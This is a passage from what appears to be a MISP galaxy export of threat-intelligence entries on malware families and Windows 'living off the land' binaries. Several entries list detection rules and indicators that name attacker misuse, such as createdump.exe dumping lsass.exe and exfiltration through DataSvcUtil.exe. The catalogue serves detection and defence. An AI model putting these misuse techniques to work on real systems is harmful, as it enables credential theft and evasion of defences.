* https://twitter.com/embee_research/status/1559410767564181504
* https://twitter.com/ankit_anubhav/status/1561683123816972288

Detection:
* IOC: conhost.exe spawning unexpected processes
* Sigma: proc_creation_win_conhost_susp_child_process.yml[Conhost.exe - LOLBAS Project]

Internal MISP references

UUID d3f8a214-3e65-4b7d-aed6-97a3e38ef8e0 which can be used as unique global reference for Conhost in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5094
source Tidal Cyber
tags ['ea54037d-e07b-42b0-afe6-33576ec36f44', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

ConnectWise

ConnectWise is a legitimate remote administration tool that has been used since at least 2016 by threat actors including MuddyWater and GOLD SOUTHFIELD to connect to and conduct lateral movement in target environments.[Anomali Static Kitten February 2021][Trend Micro Muddy Water March 2021]

Internal MISP references

UUID 6f9bb24d-cce2-49de-bedd-1849d9bde7a0 which can be used as unique global reference for ConnectWise in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0591
source MITRE
tags ['e1af18e3-3224-4e4c-9d0f-533768474508', 'fdd53e62-5bf1-41f1-8bd6-b970a866c39d', 'd431939f-2dc0-410b-83f7-86c458125444', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '15b77e5c-2285-434d-9719-73c14beba8bd', 'e727eaa6-ef41-4965-b93a-8ad0c51d0236']
type ['tool']
Related clusters

To see the related clusters, click here.

Conti

Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies, particularly those in North America. As with other ransomware families, actors using Conti steal sensitive files and information from compromised networks, and threaten to publish this data unless the ransom is paid.[Cybereason Conti Jan 2021][CarbonBlack Conti July 2020][Cybleinc Conti January 2020]

Internal MISP references

UUID 8e995c29-2759-4aeb-9a0f-bb7cd97b06e5 which can be used as unique global reference for Conti in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0575
source MITRE
tags ['562e535e-19f5-4d6c-81ed-ce2aec544f09', '0ed7d10c-c65b-4174-9edb-446bf301d250', '3d90eed2-862d-4f61-8c8f-0b8da3e45af0', '12a2e20a-7c27-46bb-954d-b372833a9925', '1b98f09a-7d93-4abb-8f3e-1eacdb9f9871', 'c2380542-36f2-4922-9ed2-80ced06645c9', 'dea4388a-b1f2-4f2a-9df9-108631d0d078', '24448a05-2337-4bc9-a889-a83f2fd1f3ad', '2743d495-7728-4a75-9e5f-b64854039792', 'd713747c-2d53-487e-9dac-259230f04460', 'fde4c246-7d2d-4d53-938b-44651cf273f1', '964c2590-4b52-48c6-afff-9a6d72e68908', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172']
type ['malware']
Related clusters

To see the related clusters, click here.

Control

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Binary used to launch controlpanel items in Windows

Author: Oddvar Moe

Paths:
* C:\Windows\System32\control.exe
* C:\Windows\SysWOW64\control.exe

Resources:
* https://pentestlab.blog/2017/05/24/applocker-bypass-control-panel/
* https://www.contextis.com/resources/blog/applocker-bypass-registry-key-manipulation/
* https://twitter.com/bohops/status/955659561008017409
* https://docs.microsoft.com/en-us/windows/desktop/shell/executing-control-panel-items
* https://bohops.com/2018/01/23/loading-alternate-data-stream-ads-dll-cpl-binaries-to-bypass-applocker/

Detection:
* Sigma: proc_creation_win_exploit_cve_2021_40444.yml
* Sigma: proc_creation_win_rundll32_susp_control_dll_load.yml
* Elastic: defense_evasion_network_connection_from_windows_binary.toml
* Elastic: defense_evasion_execution_control_panel_suspicious_args.toml
* Elastic: defense_evasion_unusual_dir_ads.toml
* IOC: Control.exe executing files from alternate data streams
* IOC: Control.exe executing library file without cpl extension
* IOC: Suspicious network connections from control.exe[Control.exe - LOLBAS Project]

Internal MISP references

UUID efc46430-b27f-4b05-bc36-1d5eba685ec7 which can be used as unique global reference for Control in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5095
source Tidal Cyber
tags ['53ac2b35-d302-4bdd-9931-5b6c6cb31b96', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

CookieMiner

CookieMiner is macOS-based malware that targets information associated with cryptocurrency exchanges and also enables cryptocurrency mining on the victim system itself. It was first discovered in the wild in 2019.[Unit42 CookieMiner Jan 2019]

Internal MISP references

UUID 6e2c4aef-2f69-4507-9ee3-55432d76341e which can be used as unique global reference for CookieMiner in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['macOS']
software_attack_id S0492
source MITRE
type ['malware']

CORALDECK

CORALDECK is an exfiltration tool used by APT37. [FireEye APT37 Feb 2018]

Internal MISP references

UUID f13c8455-d615-4f8d-9d9c-5b31e593cd8a which can be used as unique global reference for CORALDECK in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0212
source MITRE
tags ['8bf128ad-288b-41bc-904f-093f4fdde745']
type ['malware']
Related clusters

To see the related clusters, click here.

coregen

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Binary coregen.exe (Microsoft CoreCLR Native Image Generator) loads exported function GetCLRRuntimeHost from coreclr.dll or from .DLL in arbitrary path. Coregen is located within "C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\" or another version of Silverlight. Coregen is signed by Microsoft and bundled with Microsoft Silverlight.

Author: Martin Sohn Christensen

Paths:
* C:\Program Files\Microsoft Silverlight\5.1.50918.0\coregen.exe
* C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\coregen.exe

Resources:
* https://www.youtube.com/watch?v=75XImxOOInU
* https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html

Detection:
* Sigma: image_load_side_load_coregen.yml
* IOC: coregen.exe loading .dll file not in "C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\"
* IOC: coregen.exe loading .dll file not named coreclr.dll
* IOC: coregen.exe command line containing -L or -l
* IOC: coregen.exe command line containing unexpected/invalid assembly name
* IOC: coregen.exe application crash by invalid assembly name[coregen.exe - LOLBAS Project]

Internal MISP references

UUID b7dacd5c-eaba-48db-bdd7-e779a82b2ba7 which can be used as unique global reference for coregen in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5209
source Tidal Cyber
tags ['a19a158e-aec4-410a-8c3e-e9080b111183', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

CORESHELL

CORESHELL is a downloader used by APT28. The older versions of this malware are known as SOURFACE and newer versions as CORESHELL.[FireEye APT28] [FireEye APT28 January 2017]

Internal MISP references

UUID 3b193f62-2b49-4eff-bdf4-501fb8a28274 which can be used as unique global reference for CORESHELL in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0137
source MITRE
tags ['84615fe0-c2a5-4e07-8957-78ebc29b4635']
type ['malware']
Related clusters

To see the related clusters, click here.

CosmicDuke

CosmicDuke is malware that was used by APT29 from 2010 to 2015. [F-Secure The Dukes]

Internal MISP references

UUID 43b317c6-5b4f-47b8-b7b4-15cd6f455091 which can be used as unique global reference for CosmicDuke in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0050
source MITRE
tags ['16b47583-1c54-431f-9f09-759df7b5ddb7']
type ['malware']
Related clusters

To see the related clusters, click here.

CostaBricks

CostaBricks is a loader that was used to deploy 32-bit backdoors in the CostaRicto campaign.[BlackBerry CostaRicto November 2020]

Internal MISP references

UUID ea9e2d19-89fe-4039-a1e0-467b14554c6f which can be used as unique global reference for CostaBricks in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0614
source MITRE
type ['malware']

CozyCar

CozyCar is malware that was used by APT29 from 2010 to 2015. It is a modular malware platform, and its backdoor component can be instructed to download and execute a variety of modules with different functionality. [F-Secure The Dukes]

Internal MISP references

UUID c2353daa-fd4c-44e1-8013-55400439965a which can be used as unique global reference for CozyCar in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0046
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']
Related clusters

To see the related clusters, click here.

CrackMapExec

CrackMapExec, or CME, is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks.[CME Github September 2018]

Internal MISP references

UUID 47e710b4-1397-47cf-a979-20891192f313 which can be used as unique global reference for CrackMapExec in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0488
source MITRE
tags ['e1af18e3-3224-4e4c-9d0f-533768474508', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'e81ba503-60b0-4b64-8f20-ef93e7783796']
type ['tool']
Related clusters

To see the related clusters, click here.

Createdump

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Microsoft .NET Runtime Crash Dump Generator (included in .NET Core)

Author: mr.d0x, Daniel Santos

Paths:
* C:\Program Files\dotnet\shared\Microsoft.NETCore.App*\createdump.exe
* C:\Program Files (x86)\dotnet\shared\Microsoft.NETCore.App*\createdump.exe
* C:\Program Files\Microsoft Visual Studio*\Community\dotnet\runtime\shared\Microsoft.NETCore.App\6.0.0\createdump.exe
* C:\Program Files (x86)\Microsoft Visual Studio*\Community\dotnet\runtime\shared\Microsoft.NETCore.App\6.0.0\createdump.exe

Resources:
* https://twitter.com/bopin2020/status/1366400799199272960
* https://docs.microsoft.com/en-us/troubleshoot/developer/webapps/aspnetcore/practice-troubleshoot-linux/lab-1-3-capture-core-crash-dumps

Detection:
* Sigma: proc_creation_win_proc_dump_createdump.yml
* Sigma: proc_creation_win_renamed_createdump.yml
* IOC: createdump.exe process with a command line containing the lsass.exe process id[Createdump.exe - LOLBAS Project]

Internal MISP references

UUID a574b315-523c-45c3-8743-feb3d541e81a which can be used as unique global reference for Createdump in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5210
source Tidal Cyber
tags ['7beee233-2b65-4593-88e6-a5c0c02c6a08', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

CredoMap

CredoMap is a credential-stealing malware developed by the Russian espionage actor APT28. The malware harvests cookies and credentials from select web browsers and exfiltrates the information via the IMAP email protocol. CredoMap was observed being used in attack campaigns in Ukraine in 2022.[CERTFR-2023-CTI-009][SecurityScorecard CredoMap September 2022]

Internal MISP references

UUID 516ffd19-72b9-43a1-b866-bb075fdcb137 which can be used as unique global reference for CredoMap in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5074
source Tidal Cyber
tags ['904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '4d767e87-4cf6-438a-927a-43d2d0beaab7']
type ['malware']
Related clusters

To see the related clusters, click here.

CreepyDrive

CreepyDrive is a custom implant that has been used by POLONIUM since at least early 2022 for C2 with, and exfiltration to, actor-controlled OneDrive accounts.[Microsoft POLONIUM June 2022]

POLONIUM has used a similar implant called CreepyBox that relies on actor-controlled DropBox accounts.[Microsoft POLONIUM June 2022]

Internal MISP references

UUID 7f7f05c3-fbb1-475e-b672-2113709065c8 which can be used as unique global reference for CreepyDrive in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Office 365', 'Windows']
software_attack_id S1023
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

CreepySnail

CreepySnail is a custom PowerShell implant that has been used by POLONIUM since at least 2022.[Microsoft POLONIUM June 2022]

Internal MISP references

UUID 11ce380c-481b-4c9b-b44e-06f1a91c01c1 which can be used as unique global reference for CreepySnail in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S1024
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

Crimson

Crimson is a remote access Trojan that has been used by Transparent Tribe since at least 2016.[Proofpoint Operation Transparent Tribe March 2016][Kaspersky Transparent Tribe August 2020]

Internal MISP references

UUID 3b3f296f-20a6-459a-98c5-62ebdee3701f which can be used as unique global reference for Crimson in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0115
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']
Related clusters

To see the related clusters, click here.

CrossRAT

CrossRAT is a cross-platform RAT.

Internal MISP references

UUID 38811c3b-f548-43fa-ab26-c7243b84a055 which can be used as unique global reference for CrossRAT in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['macOS', 'Linux', 'Windows']
software_attack_id S0235
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

Crutch

Crutch is a backdoor designed for document theft that has been used by Turla since at least 2015.[ESET Crutch December 2020]

Internal MISP references

UUID e1ad229b-d750-4148-a1f3-36e767b03cd1 which can be used as unique global reference for Crutch in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0538
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

Cryptoistic

Cryptoistic is a backdoor, written in Swift, that has been used by Lazarus Group.[SentinelOne Lazarus macOS July 2020]

Internal MISP references

UUID 12ce6d04-ebe5-440e-b342-0283b7c8a0c8 which can be used as unique global reference for Cryptoistic in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['macOS']
software_attack_id S0498
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

Csc

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Binary file used by .NET to compile C# code

Author: Oddvar Moe

Paths:
* C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe
* C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Csc.exe

Resources:
* https://docs.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/command-line-building-with-csc-exe

Detection:
* Sigma: proc_creation_win_csc_susp_parent.yml
* Sigma: proc_creation_win_csc_susp_folder.yml
* Elastic: defense_evasion_dotnet_compiler_parent_process.toml
* Elastic: defense_evasion_execution_msbuild_started_unusal_process.toml
* IOC: Csc.exe should normally not run as System account unless it is used for development.[Csc.exe - LOLBAS Project]

Internal MISP references

UUID 939eeb6b-3f74-43b6-8ead-644457ee7d78 which can be used as unique global reference for Csc in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5096
source Tidal Cyber
tags ['2ee25dd6-256c-4659-b1b6-f5afc943ccc1', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']
Related clusters

To see the related clusters, click here.

Cscript

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Binary used to execute scripts in Windows

Author: Oddvar Moe

Paths:
* C:\Windows\System32\cscript.exe
* C:\Windows\SysWOW64\cscript.exe

Resources:
* https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
* https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/

Detection:
* Sigma: proc_creation_win_wscript_cscript_script_exec.yml
* Sigma: file_event_win_net_cli_artefact.yml
* Elastic: defense_evasion_unusual_dir_ads.toml
* Elastic: command_and_control_remote_file_copy_scripts.toml
* Elastic: defense_evasion_suspicious_managedcode_host_process.toml
* Splunk: wscript_or_cscript_suspicious_child_process.yml
* BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
* IOC: Cscript.exe executing files from alternate data streams
* IOC: DotNet CLR libraries loaded into cscript.exe
* IOC: DotNet CLR Usage Log - cscript.exe.log[Cscript.exe - LOLBAS Project]

Internal MISP references

UUID 83036c61-d8cf-42f8-a9e5-dc3d26d75cdc which can be used as unique global reference for Cscript in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5097
source Tidal Cyber
tags ['7cae5f59-dbbf-406f-928d-118430d2bdd0', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

csi

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Command line interface included with Visual Studio.

Author: Oddvar Moe

Paths:
* c:\Program Files (x86)\Microsoft Visual Studio\2017\Community\MSBuild\15.0\Bin\Roslyn\csi.exe
* c:\Program Files (x86)\Microsoft Web Tools\Packages\Microsoft.Net.Compilers.X.Y.Z\tools\csi.exe

Resources:
* https://twitter.com/subTee/status/781208810723549188
* https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/

Detection:
* Sigma: proc_creation_win_csi_execution.yml
* Sigma: proc_creation_win_csi_use_of_csharp_console.yml
* Elastic: defense_evasion_unusual_process_network_connection.toml
* Elastic: defense_evasion_network_connection_from_windows_binary.toml
* BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules[csi.exe - LOLBAS Project]

Internal MISP references

UUID a11e4ebf-59e4-4b79-8a20-be1618dfbaed which can be used as unique global reference for csi in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5211
source Tidal Cyber
tags ['86bb7f3c-652c-4f77-af2a-34677ff42315', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

CSPY Downloader

CSPY Downloader is a tool designed to evade analysis and download additional payloads used by Kimsuky.[Cybereason Kimsuky November 2020]

Internal MISP references

UUID eb481db6-d7ba-4873-a171-76a228c9eb97 which can be used as unique global reference for CSPY Downloader in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0527
source MITRE
type ['tool']
Related clusters

To see the related clusters, click here.

Cuba

Cuba is a Windows-based ransomware family that has been used against financial institutions, technology, and logistics organizations in North and South America as well as Europe since at least December 2019.[McAfee Cuba April 2021]

Internal MISP references

UUID 095064c6-144e-4935-b878-f82151bc08e4 which can be used as unique global reference for Cuba in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0625
source MITRE
tags ['562e535e-19f5-4d6c-81ed-ce2aec544f09', '4bc9ab8f-7f57-4b1a-8857-ffaa7e5cc930', '17864218-bc4f-4564-8abf-97c988eea9f7', 'b6458e46-650e-4e96-8e68-8a9d70bcf045', 'bac51672-8240-4182-9087-23626023e509', 'c5c8f954-1bc0-45d5-9a4f-4385d0a720a1', '2743d495-7728-4a75-9e5f-b64854039792', 'd713747c-2d53-487e-9dac-259230f04460', 'fde4c246-7d2d-4d53-938b-44651cf273f1', '964c2590-4b52-48c6-afff-9a6d72e68908', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172']
type ['malware']

CustomShellHost

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: A host process that is used by custom shells when using Windows in Kiosk mode.

Author: Wietze Beukema

Paths:
* C:\Windows\System32\CustomShellHost.exe

Resources:
* https://twitter.com/YoSignals/status/1381353520088113154
* https://docs.microsoft.com/en-us/windows/configuration/kiosk-shelllauncher

Detection:
* IOC: CustomShellHost.exe is unlikely to run on normal workstations
* Sigma: proc_creation_win_lolbin_customshellhost.yml[CustomShellHost.exe - LOLBAS Project]

Internal MISP references

UUID 3ff0d4fc-6678-42f0-869b-f48906d98f82 which can be used as unique global reference for CustomShellHost in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5098
source Tidal Cyber
tags ['536c3d51-9fc4-445e-9723-e11b69f0d6d5', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

Cyclops Blink

Cyclops Blink is a modular malware that has been used in widespread campaigns by Sandworm Team since at least 2019 to target Small/Home Office (SOHO) network devices, including WatchGuard and Asus.[NCSC Cyclops Blink February 2022][NCSC CISA Cyclops Blink Advisory February 2022][Trend Micro Cyclops Blink March 2022]

Internal MISP references

UUID 68792756-7dbf-41fd-8d48-ac3cc2b52712 which can be used as unique global reference for Cyclops Blink in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Network']
software_attack_id S0687
source MITRE
tags ['b20e7912-6a8d-46e3-8e13-9a3fc4813852', 'e809d252-12cc-494d-94f5-954c49eb87ce']
type ['malware']
Related clusters

To see the related clusters, click here.

Dacls

Dacls is a multi-platform remote access tool used by Lazarus Group since at least December 2019.[TrendMicro macOS Dacls May 2020][SentinelOne Lazarus macOS July 2020]

Internal MISP references

UUID 9d521c18-09f0-47be-bfe5-e1bf26f7b928 which can be used as unique global reference for Dacls in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
software_attack_id S0497
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

DanBot

DanBot is a first-stage remote access Trojan written in C# that has been used by HEXANE since at least 2018.[SecureWorks August 2019]

Internal MISP references

UUID 131c0eb2-9191-4ccd-a2d6-5f36046a8f2f which can be used as unique global reference for DanBot in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S1014
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']
Related clusters

To see the related clusters, click here.

DarkComet

DarkComet is a Windows remote administration tool and backdoor.[TrendMicro DarkComet Sept 2014][Malwarebytes DarkComet March 2018]

Internal MISP references

UUID 74f88899-56d0-4de8-97de-539b3590ab90 which can be used as unique global reference for DarkComet in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0334
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']
Related clusters

To see the related clusters, click here.

DarkGate

DarkGate is a commodity downloader. Researchers have often observed DarkGate samples making use of legitimate copies of AutoIt, a freeware BASIC-like scripting language, using it to run AutoIt scripts as part of its execution chain. Reports of DarkGate infections surged following the announcement of the disruption of the QakBot botnet by international authorities in late August 2023.[Bleeping Computer DarkGate October 14 2023] The delivery of DarkGate payloads via instant messaging platforms including Microsoft Teams and Skype was reported in September and October 2023.[DarkGate Loader delivered via Teams - Truesec][Trend Micro DarkGate October 12 2023]

Internal MISP references

UUID 7144b703-f471-4bde-bedc-e8b274854de5 which can be used as unique global reference for DarkGate in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5266
source Tidal Cyber
tags ['84615fe0-c2a5-4e07-8957-78ebc29b4635']
type ['malware']
Related clusters

To see the related clusters, click here.

DarkTortilla

DarkTortilla is a highly configurable .NET-based crypter that has possibly been active since at least August 2015. DarkTortilla has been used to deliver popular information stealers, RATs, and payloads such as Agent Tesla, AsyncRat, NanoCore, RedLine, Cobalt Strike, and Metasploit.[Secureworks DarkTortilla Aug 2022]

Internal MISP references

UUID 35abcb6b-3259-57c1-94fc-50cfd5bde786 which can be used as unique global reference for DarkTortilla in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S1066
source MITRE
type ['malware']

DarkWatchman

DarkWatchman is a lightweight JavaScript-based remote access tool (RAT) that avoids file operations; it was first observed in November 2021.[Prevailion DarkWatchman 2021]

Internal MISP references

UUID 740a0327-4caf-4d90-8b51-f3f9a4d59b37 which can be used as unique global reference for DarkWatchman in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0673
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']

Daserf

Daserf is a backdoor that has been used to spy on and steal from Japanese, South Korean, Russian, Singaporean, and Chinese victims. Researchers have identified versions written in both Visual C and Delphi. [Trend Micro Daserf Nov 2017] [Secureworks BRONZE BUTLER Oct 2017]

Internal MISP references

UUID fad65026-57c4-4d4f-8803-87178dd4b887 which can be used as unique global reference for Daserf in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0187
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

DataSvcUtil

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: DataSvcUtil.exe is a command-line tool provided by WCF Data Services that consumes an Open Data Protocol (OData) feed and generates the client data service classes that are needed to access a data service from a .NET Framework client application.

Author: Ialle Teixeira

Paths:
* C:\Windows\Microsoft.NET\Framework64\v3.5\DataSvcUtil.exe

Resources:
* https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/wcf-data-service-client-utility-datasvcutil-exe
* https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/generating-the-data-service-client-library-wcf-data-services
* https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/how-to-add-a-data-service-reference-wcf-data-services

Detection:
* Sigma: proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml
* IOC: The DataSvcUtil.exe tool is installed in the .NET Framework directory.
* IOC: Preventing/Detecting DataSvcUtil with non-RFC1918 addresses by Network IPS/IDS.
* IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching DataSvcUtil.[DataSvcUtil.exe - LOLBAS Project]

Internal MISP references

UUID dd555a4c-3b04-48c1-988f-d530d699a5bf which can be used as unique global reference for DataSvcUtil in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5099
source Tidal Cyber
tags ['0576be43-65c6-4d1a-8a06-ed8232ca0120', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

DCSrv

DCSrv is destructive malware that has been used by Moses Staff since at least September 2021. Though DCSrv has ransomware-like capabilities, Moses Staff does not demand ransom or offer a decryption key.[Checkpoint MosesStaff Nov 2021]

Internal MISP references

UUID 26ae3cd1-6710-4807-b674-957bd67d3e76 which can be used as unique global reference for DCSrv in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S1033
source MITRE
tags ['5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172']
type ['malware']
Related clusters

To see the related clusters, click here.

DDKONG

DDKONG is a malware sample that was part of a campaign by Rancor. DDKONG was first seen used in February 2017. [Rancor Unit42 June 2018]

Internal MISP references

UUID 0657b804-a889-400a-97d7-a4989809a623 which can be used as unique global reference for DDKONG in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
software_attack_id S0255
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

DEADEYE

DEADEYE is a malware launcher that has been used by APT41 since at least May 2021. DEADEYE has variants that can either embed a payload inside a compiled binary (DEADEYE.EMBED) or append it to the end of a file (DEADEYE.APPEND).[Mandiant APT41]

Internal MISP references

UUID e9533664-90c5-5b40-a40e-a69a2eda8bc9 which can be used as unique global reference for DEADEYE in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S1052
source MITRE
tags ['84615fe0-c2a5-4e07-8957-78ebc29b4635']
type ['malware']

DealersChoice

DealersChoice is a Flash exploitation framework used by APT28. [Sofacy DealersChoice]

Internal MISP references

UUID 64dc5d44-2304-4875-b517-316ab98512c2 which can be used as unique global reference for DealersChoice in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0243
source MITRE
tags ['84615fe0-c2a5-4e07-8957-78ebc29b4635']
type ['malware']
Related clusters

To see the related clusters, click here.

DEATHRANSOM

DEATHRANSOM is ransomware written in C that has been used since at least 2020, and has potential overlap with FIVEHANDS and HELLOKITTY.[FireEye FiveHands April 2021]

Internal MISP references

UUID 832f5ab1-1267-40c9-84ef-f32d6373be4e which can be used as unique global reference for DEATHRANSOM in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0616
source MITRE
tags ['5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172']
type ['malware']

DefaultPack

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

